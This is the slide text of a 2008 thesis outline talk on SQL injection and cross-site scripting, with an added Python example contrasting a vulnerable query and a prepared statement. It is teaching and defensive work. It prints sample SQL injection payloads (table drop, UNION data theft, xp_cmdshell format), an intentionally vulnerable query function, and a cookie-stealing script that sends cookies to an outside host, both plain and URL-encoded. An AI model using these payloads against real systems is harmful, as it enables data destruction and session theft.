Whatever it takes: Fixing SQLIA and XSS in the process
Diploma Thesis Outline Presentation, Florian Thiel
Seminar “Beiträge zum Software Engineering”, FU Berlin, 11/06/2008
1. XSS
2. Injection Flaws
3. Malicious File Execution
4. Insecure Direct Object Reference
5. Cross-Site Request Forgery
OWASP Top 10 2007
© by xkcd: http://xkcd.com/327/
"SELECT firstname FROM Students WHERE (login = '%s');" % login
SELECT firstname FROM Students WHERE (login = 'Robert'); DROP TABLE Students; -- ');
Confidentiality
SELECT product FROM Products WHERE productid = '0 UNION SELECT owner, balance FROM Accounts; --';
SELECT product, price FROM products WHERE categoryid = exec master..xp_cmdshell "format c:"-- ;
New Attack Vector
Why it’s hard
Control Data
More problems
• validation context != execution context
• really tolerant DBs
• "SEL"+"ECT", anyone?
• DBs trying to fix illegal SQL
Something different!?
http://searchsite/search?keyword="<script>alert('you have been XSSed!')</script>"
“This issue isn't just about scripting, and there isn't necessarily anything cross site about it. So why the name? It was coined earlier on when the problem was less understood, and it stuck. Believe me, we have had more important things to do than think of a better name. <g>”
-- Marc Slemko, Apache.org
Got cookies?
<script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?' +document.cookie</script>
Got cookies?
%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%69%6e%2f%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e
Common flaws
• HTML/XSS and SQL
• mix data and control
• have no well-defined execution environment
• have no “API”
Another job well done!
GET /en-us/library/aa287673(VS.71).aspx HTTP/1.1
Host: msdn.microsoft.com
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.google.de/search?q=http+request+header+example&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cache-Control: max-age=0
Hmm, are we missing something here?
1. Make developers use a reasonable architecture
2. Make developers recognize a weakness when they meet one
3. Make developers find weaknesses
4. Make people actually fix things
Artifacts
• reviewer annotates suspicious code regions
• e.g. @userinput, @output
• makes review work visible in the source code
• and more valuable since annotations can be reused
// @userinput(data)
// [insert data into query, ignore non-alphanums]
def insertAlphaNum(query, data):
    // [make sure data is canonical]
    c_data = data.toCharSet(...)
    c_data.replace(...)
    ...
    // [insert data into query]
    query.prepare(...)
    query.insert(data...)
    ...
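An added, runnable illustration (not the thesis' code) of the two slides above: the string-formatted Students query from the SQLIA slide next to a prepared-statement version, plus a hypothetical Python realisation of the insertAlphaNum sketch. It assumes an in-memory sqlite3 table constructed here; because sqlite3.execute() refuses stacked statements, the injected input is a quote-closing always-true clause rather than the slide's DROP TABLE, which shows the same data/control mixing.

```python
import sqlite3
import unicodedata

def make_db():
    """Constructed stand-in for the Students table on the slide."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Students (login TEXT, firstname TEXT)")
    conn.executemany("INSERT INTO Students VALUES (?, ?)",
                     [("robert", "Robert"), ("alice", "Alice")])
    return conn

def lookup_vulnerable(conn, login):
    """The slide's query: data is spliced into the SQL text, so a quote in
    `login` changes the statement's structure (the control channel)."""
    query = "SELECT firstname FROM Students WHERE (login = '%s');" % login
    return [row[0] for row in conn.execute(query)]

def lookup_prepared(conn, login):
    """Same query with a placeholder: the statement structure is fixed before
    the driver binds `login`, so the value can only ever be data."""
    query = "SELECT firstname FROM Students WHERE (login = ?);"
    return [row[0] for row in conn.execute(query, (login,))]

def insert_alpha_num(conn, login):
    """Hypothetical realisation of insertAlphaNum from the Artifacts slide:
    canonicalise, keep only alphanumerics, then bind as a parameter."""
    canonical = unicodedata.normalize("NFKC", login)   # e.g. fullwidth -> ASCII
    cleaned = "".join(ch for ch in canonical if ch.isalnum())
    if not cleaned:                                    # nothing usable left
        return []
    return lookup_prepared(conn, cleaned)

if __name__ == "__main__":
    db = make_db()
    evil = "x') OR ('1'='1"   # closes the parenthesis, appends an always-true clause
    print(lookup_vulnerable(db, "robert"))   # ['Robert']
    print(lookup_vulnerable(db, evil))       # ['Robert', 'Alice']: every row leaks
    print(lookup_prepared(db, evil))         # []
    print(insert_alpha_num(db, evil))        # [] (looked up as 'xOR11')
```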
4) (Repair)
• once weakness is known, developers should be motivated enough
• focus is on keeping the code secure, minimizing effort
My tasks
• provide practical architectural assumptions
• construct effective reading method
• + awareness of potential weaknesses
• get a project to adopt my methods
This presentation is licensed under a Creative Commons BY-SA license.
Slides, materials, progress etc. can be found @ http://www.noroute.de/blog/diplomathesis
Attribution for pictures through links.